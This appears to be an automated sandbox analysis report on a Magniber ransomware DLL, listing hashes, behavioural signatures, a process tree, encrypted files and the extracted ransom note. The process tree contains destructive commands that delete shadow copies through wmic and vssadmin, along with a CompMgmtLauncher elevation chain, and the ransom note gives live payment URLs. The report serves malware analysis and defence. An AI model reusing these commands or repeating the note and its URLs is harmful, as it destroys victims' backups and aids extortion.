Overview

overview

10

Static

static

3

cbf762fb16...fd.dll

windows7-x64

10

cbf762fb16...fd.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    28-12-2023 06:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cbf762fb16cfe0149b46a61f3fb029fd.dll

  • Size

    38KB

  • MD5

    cbf762fb16cfe0149b46a61f3fb029fd

  • SHA1

    24d70407e12631bd83f39164bcd5ca6a74a0b459

  • SHA256

    2cd5879589f6af26488a2c9451d279306c472302375916e34f2646e7095ce4b9

  • SHA512

    e26dd9fcb24b7357da2230c87d6ee7ed59f1288118160b42d92161a42e77a91077a8a9c6b9ab49a68f6cdf7135d57be3a465190118112d1c0a49e7408b28a853

  • SSDEEP

    768:tNB4vRN8egwET/AOBHR9T7lGFDZFpVNKu90lQtwPFhXB+6OPvF65IM0:5A8ugn5T7le1l1Gb+6OPvdM

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://12d014b07e301ec08cawbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke http://12d014b07e301ec08cawbcrke.tietill.space/awbcrke http://12d014b07e301ec08cawbcrke.hesmust.top/awbcrke http://12d014b07e301ec08cawbcrke.salecup.club/awbcrke Note! These are temporary addresses! They will be available for a limited amount of time! ?�
URLs

http://12d014b07e301ec08cawbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke

http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke

http://12d014b07e301ec08cawbcrke.tietill.space/awbcrke

http://12d014b07e301ec08cawbcrke.hesmust.top/awbcrke

http://12d014b07e301ec08cawbcrke.salecup.club/awbcrke

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (98) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1236
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:2328
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        2⤵
          PID:1480
      • C:\Windows\system32\DllHost.exe
        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
        1⤵
          PID:804
        • C:\Windows\Explorer.EXE
          C:\Windows\Explorer.EXE
          1⤵
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:1420
          • C:\Windows\system32\rundll32.exe
            rundll32.exe C:\Users\Admin\AppData\Local\Temp\cbf762fb16cfe0149b46a61f3fb029fd.dll,#1
            2⤵
            • Suspicious use of SetThreadContext
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1948
            • C:\Windows\system32\notepad.exe
              notepad.exe C:\Users\Public\readme.txt?
              3⤵
              • Opens file in notepad (likely ransom note)
              PID:1772
            • C:\Windows\system32\wbem\wmic.exe
              C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2792
            • C:\Windows\system32\cmd.exe
              cmd /c "start http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke^&2^&55056338^&98^&409^&12"?
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1608
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" http://12d014b07e301ec08cawbcrke.hegame.xyz/awbcrke&2&55056338&98&409&12?
                4⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:832
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:832 CREDAT:275457 /prefetch:2
                  5⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2476
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2800
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1888
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1280
            • C:\Windows\system32\wbem\WMIC.exe
              C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
              3⤵
                PID:596
            • C:\Windows\system32\wbem\wmic.exe
              C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
              2⤵
                PID:1476
            • C:\Windows\system32\Dwm.exe
              "C:\Windows\system32\Dwm.exe"
              1⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1328
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2544
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  3⤵
                    PID:2532
                • C:\Windows\system32\wbem\wmic.exe
                  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                  2⤵
                    PID:2968
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:2580
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1952
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2556
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:2596
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                      PID:2436
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:3020
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:1076
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      1⤵
                      • Process spawned unexpected child process
                      • Suspicious use of WriteProcessMemory
                      PID:1672
                      • C:\Windows\system32\CompMgmtLauncher.exe
                        CompMgmtLauncher.exe
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1180
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2224
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:1980
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:1832
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1348
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:2732
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:1844
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:1824
                        • C:\Windows\system32\cmd.exe
                          cmd /c CompMgmtLauncher.exe
                          1⤵
                          • Process spawned unexpected child process
                          PID:2268
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            2⤵
                              PID:1888
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:2312
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:2836
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:3020

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              16d2c2bbb38cf4b23258866f3074be28

                              SHA1

                              e81afbac3a3382d4f3407ac6c59ed49c1328abb5

                              SHA256

                              c2729688706119364f62c84f7682575160d1e0240b4fd215f3eb90cd8189d35d

                              SHA512

                              416b53a201e989768a90fc738ca620042522e9d47cf0555c2a7ea0d39d534123ac3449b3d12a1e42b9b4524b27f544c86d79c2c6760305f2519cb8eb4b22656e

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              cbf8be1ebdf3f5147674828dba6fc3b7

                              SHA1

                              5cfcc894c585d6219eb1e9ba24cbd90e2d7c4cc8

                              SHA256

                              ac647fcf981324b5bc3a6b94fb96f38771aaf4b924b412a3c00accb3ef80ae02

                              SHA512

                              eab4f5d96292711cb590586955f083b29d6aafa18a7ba6b3d8fc5d32015ae1e1c94a6d04028d4144c70b4f88326bf2ab65f0b6227c203f9350f1b25cd284c4e3

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              63d24e1271948665b22d249c0748cc64

                              SHA1

                              87bc282acf79689a0c1cec83d0458b677b028a86

                              SHA256

                              568846e7cae972f160658c149a5f5871805b8a1fa7a29db982da89784e9e2944

                              SHA512

                              3b22394440e16ae95ca7578107cc15c2e8986c6eb2f826764f4b13526edf7a910f6ddef0b4138d79a7e6933fcd091458ea5eed6087a444da2a4962debabc607b

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              bbcd0a62cc03984c3c59c604ce0f6b28

                              SHA1

                              ed315a0f7d2b51c144c6918f41c5a92b58fc2b52

                              SHA256

                              4451182174b9c94e2f1fd97397d63d3e22580d4e664a7545344c0b4a366d07bf

                              SHA512

                              e9f4589401d2edd3b903ed625dc8d8b20c6d370613ec1ba512b8e42ef16f4f9298aa684d3b78312cb712b0c1c2a8b659cc6aff2f96a2e19cf74e10c964a1ee72

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8cba35d84a8830f4f83fa1e43a9ee4e5

                              SHA1

                              917b693e70db6f08ad6452521dac16a44731f3e0

                              SHA256

                              0834c6942ce9d82e4f07d82faaa6cfe83a1434380b4aaf189c2592813fe1ba93

                              SHA512

                              69ac2d2a863468b30debb325848aa7741bab4de23572c0b61fb54addf857c50a5eff269222e67d7e76cdde346a9c0b16e3b7bf4806c1f3a45a0a7fe0fb8594c0

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              3f899af97103e3278dfc0468dd250510

                              SHA1

                              99c13bda8701ccd11a730570333f6a4bad3b9698

                              SHA256

                              2adc2b5a0b8b0c4b4ed0ee06e5c4d6574b04fa586ddd47c6ac565d5a92dc7092

                              SHA512

                              fc3a5431d0334dca807a99a5c25bad556389d8bf18b45896a8fdfae5487e01afc69f407d42175b2933a00e05caca334fc17ad2c6f5c5835e490c04d6c769c51c

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              07e07a8b0579f7a9456d8c0458a17129

                              SHA1

                              0a511c43018c29318c2855595283186bcc016ffa

                              SHA256

                              cadf2e91fa03855aa4aab1d1e13579a00a4ef55f44afbcb4e083b14f3430f3f5

                              SHA512

                              f628c1e102d0b369accecf6fd6bff07bc8c159822419b227cc8f677d055ecbce9d614de67a3d5f12d89e4c1f3e18cb4b7840ae046a2db89a5ee0016285d832d2

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              9cf641fcc3a9d12c7288f25dff34b2a5

                              SHA1

                              b6a521d2680bfd3b9c0e7ba556e89340375376fb

                              SHA256

                              d80b7581d8279ef00260660e8ebbbca62014c310057423c42c2f0d21071fe8c6

                              SHA512

                              f0bd2e65dbff9b8fc903222a097360ba1dbf5b70b1002154cb8b9a3bd32af9aa990ed43e9bdc1b425d74eb1f8f6cc17aa424dc692b982e6438ee1dba212817aa

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              8d8da7034a6e82be16efde7f654f5f9a

                              SHA1

                              2d962f147018d2bec298f2cd6c3f5d1dd0a2f2e0

                              SHA256

                              d1563f3e3f16f0cfb4985145f51559ff6b63c09556ceb1d01c31c66c32d44560

                              SHA512

                              2d6f71ac7f63be56d0bd848233149c9ba25d0bd7398143204b6c33e64cafae61390ff4c3da484fbd77aec694d43ea8639324fa7bbb35eefdec708c619a517259

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              87004b70f6c3495f5f3897edb1641a18

                              SHA1

                              a119b2edadd48cb51e90d3fcbc50c2a646f4403e

                              SHA256

                              732d2c718648191fd6c22ce28e5b4c8ea0e326d10ec5c72aa74ff173f7efaf43

                              SHA512

                              6ac71564e2838ce18207942a84854c20dff2692ec68a9cc0f7946c085ec81cb32556c6e588fb3cdef66c5c55505d62504515ee15bf95ecf86f4c624ef039893a

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              9c5276f180050ca815af6ea5d1b30755

                              SHA1

                              25b83895bedde1ccdeb2915a45b5f15fda3f16d4

                              SHA256

                              5684251445ca2965001ff8cc58ac11a5ec25dfd536f709660be298589f0e41a5

                              SHA512

                              45f2630efb29be2c504d9294c0e121fbe678a6af8779eb6011ddc86a0bdb45472db0d9c6f65c1f8527e5d4f35094d40434e89621f411392e91b6383481f000a3

                              Download Submit

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                              Filesize

                              344B

                              MD5

                              dba1e5cbe56f38738b392c0b4b1498c2

                              SHA1

                              1ba6af9991ee16c024ee84e49237a5a85761230a

                              SHA256

                              f365a7415ff296181a52114bcfc3fd3a1ae1a3f05cca68897454be1bdc63c3a7

                              SHA512

                              fa108f39798ad111ff47e0e5c82ac6b3d0323ca0c52ab1625ad7b60c151ec88beaccdb5a41531aa6aa23799541814f58bdcde7bfc91afc3f4116f2762e36a8cc

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\CabFDC.tmp
                              Filesize

                              65KB

                              MD5

                              ac05d27423a85adc1622c714f2cb6184

                              SHA1

                              b0fe2b1abddb97837ea0195be70ab2ff14d43198

                              SHA256

                              c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                              SHA512

                              6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\Tar14FD.tmp
                              Filesize

                              171KB

                              MD5

                              9c0c641c06238516f27941aa1166d427

                              SHA1

                              64cd549fb8cf014fcd9312aa7a5b023847b6c977

                              SHA256

                              4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                              SHA512

                              936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                              Download Submit

                            • C:\Users\Admin\Desktop\ClearRegister.ppt.awbcrke
                              Filesize

                              761KB

                              MD5

                              0199ed2510dc7478a8307bc7caf2f3a9

                              SHA1

                              d79f99a95801473811e70c239c5124494d7dd936

                              SHA256

                              6c169aee30dd378b26ca2bfcde2132cb91a1f16e417d3cbc9fff0e19f31e290d

                              SHA512

                              4fa5b8dd644240da72379413a6b2b750038c0694a5c127291fea225bfc29f2629cd0141edb8bdaf3fc2b0929dff51f663283fba1c2b178795a75c32fbdaacc74

                              Download Submit

                            • C:\Users\Admin\Desktop\ConvertFromExport.vstm.awbcrke
                              Filesize

                              269KB

                              MD5

                              940430c0afdac6a59394a8199b9794e5

                              SHA1

                              542021f66c7edbe8762b0efa45483ecc41a55eb2

                              SHA256

                              68c53d56fbeb428e3efcd25613fcc289460cfec5ceda3ea2b4e833c7c0ae2eff

                              SHA512

                              891626fb2c13aff08e5c8d2e6de6401f4771d022ef7f9e02345e33deab112057a8f49fce7abee6f144b77cf35826ffba9e54a557d7ad725af3789908c64b9649

                              Download Submit

                            • C:\Users\Admin\Desktop\ProtectTest.pot.awbcrke
                              Filesize

                              381KB

                              MD5

                              065ffb299f539d0dd5a8c019413d91be

                              SHA1

                              03ae3034bb7f44c1a2391b7a0b38da39b19c062c

                              SHA256

                              1e27d673b31988f3254aabab0f91df04772ebbd6ba54b4a0b558f9b8ccce0248

                              SHA512

                              cde4137f7beb4d28af71e0cd14071cf89d2bbe611d55f1ae195b044d63ba634142f3dbe78e9566eff09d41b76b489372ea6b0f947cb093192e3e8c57684a7e25

                              Download Submit

                            • C:\Users\Admin\Desktop\RenameInvoke.mov.awbcrke
                              Filesize

                              455KB

                              MD5

                              630e229b5bce38a79dbb1140a41fc0dc

                              SHA1

                              bef2f66b3554b0b6a99a5632da6da751a58c9fe8

                              SHA256

                              5a048c08bc424f6fa688551f5902f1baa941fb779114140f204d65f1d5bfcde7

                              SHA512

                              07c4d05d1743c995aceda6a58add073d6ab6cf27c2213ecf551c758f59c68643b506bd3d9c739985bcd86a20a8408871306a7b66b6b5091f8209c572a28fafc9

                              Download Submit

                            • C:\Users\Admin\Desktop\RevokeConvert.mov.awbcrke
                              Filesize

                              473KB

                              MD5

                              103d8b7681484547e186f28b9ae58620

                              SHA1

                              9c28d5b04697f9b4f5f82164040fc6985eb7121f

                              SHA256

                              bbf740d05f1617fbbc401f4d0eb54c8d3c6a6d679671c7e3a44975a1f4c61359

                              SHA512

                              5e34671b0011d18f8436ee49c937f3bb05fe29e3dd5d6f0b228b22b5e2886922003495076e97f7d2b493533d4f28a093bbadac1a67b17e5d7bd70692aa22c930

                              Download Submit

                            • C:\Users\Admin\Desktop\ShowSet.pptm.awbcrke
                              Filesize

                              548KB

                              MD5

                              e6e236924eeea98240c137d447415ec1

                              SHA1

                              614dfa51f5e7ff3dbd37ae5ff377cacdee32fa17

                              SHA256

                              b74329985c65424116aa9b91dfb836629e38c7c3a7a96e829a9bbb4f885e80d7

                              SHA512

                              452140c7f3654ecbc11c7e6cfd9f26fa294fdd74c1b964b2e12a88ca1fb989e7c25f9574593dc33aab1d9bb5fef3140349d209a81565054d3c059596d83a295c

                              Download Submit

                            • C:\Users\Admin\Desktop\SyncSuspend.odt.awbcrke
                              Filesize

                              399KB

                              MD5

                              359f278c85d63599b686adeb0c1f9dcc

                              SHA1

                              24e3f4d6c56e66138692b7c7a444eb7aaea256e3

                              SHA256

                              b570e2c5c502d47930899658abc65411e4e53dc68448c8bf40d7ae8b8c50e9bf

                              SHA512

                              d5ed6dd32d83f824dc75ea1a91a75f518a80a173583618cb62f419bb603ee4726962f4af0de91dc3cb69d85b722e72fa6cbfaefae7f75f0b97c574fa522f68a8

                              Download Submit

                            • C:\Users\Admin\Desktop\UnpublishSet.vbs.awbcrke
                              Filesize

                              418KB

                              MD5

                              07bddaafc27730773400d3a7764c9e3b

                              SHA1

                              5a93d030a90e86eb2ff2907a63b1b3036a42ce4f

                              SHA256

                              f596b9118c2a6a8c881f89df39c1716e70554365afd218003bc19a1e2f9dbebf

                              SHA512

                              4cdafc35277b34fd4a58e26afa31c22624adb119c4b239ad63b233e4c429bb9fb01de099833f9e18a4be29a26014f362cab00ded4f6766bafba080bea0f92590

                              Download Submit

                            • C:\Users\Admin\Pictures\readme.txt婍
                              Filesize

                              1KB

                              MD5

                              a38c89f2c95501f1e13668ef03772c3a

                              SHA1

                              6fca8dd2bf37488ca75a8cf40acc42d42fcc1a26

                              SHA256

                              89b44b0b0b0aa2a4559547a5df43f27c01eb7b23ebd781ac8cfd11363d78e5f9

                              SHA512

                              3a60ad8f80931a7328a594b8be1bf536c4df04bb36e68f2e2762f881f6ab5f99a7da45fdee2df90b6bc53238d58c77bcbd1da518d6abe23b7c7201ca5bbe1cc6

                              Download Submit

                            • memory/1236-16-0x0000000001B40000-0x0000000001B45000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/1236-0-0x0000000001B40000-0x0000000001B45000-memory.dmp

                              Filesize

                              20KB

                              Download

                            • memory/1948-9-0x0000000000160000-0x0000000000161000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-12-0x0000000000240000-0x0000000000241000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-331-0x0000000004560000-0x0000000004561000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-11-0x0000000000180000-0x0000000000181000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-14-0x0000000000260000-0x0000000000261000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-15-0x0000000000270000-0x0000000000271000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-13-0x0000000000250000-0x0000000000251000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-17-0x0000000004540000-0x0000000004541000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-8-0x0000000000150000-0x0000000000151000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-6-0x0000000000140000-0x0000000000141000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-3-0x0000000000120000-0x0000000000121000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-5-0x0000000000130000-0x0000000000131000-memory.dmp

                              Filesize

                              4KB

                              Download

                            • memory/1948-1-0x0000000001D70000-0x00000000026A8000-memory.dmp

                              Filesize

                              9.2MB

                              Download

                            • memory/1948-2-0x0000000000110000-0x0000000000111000-memory.dmp

                              Filesize

                              4KB

                              Download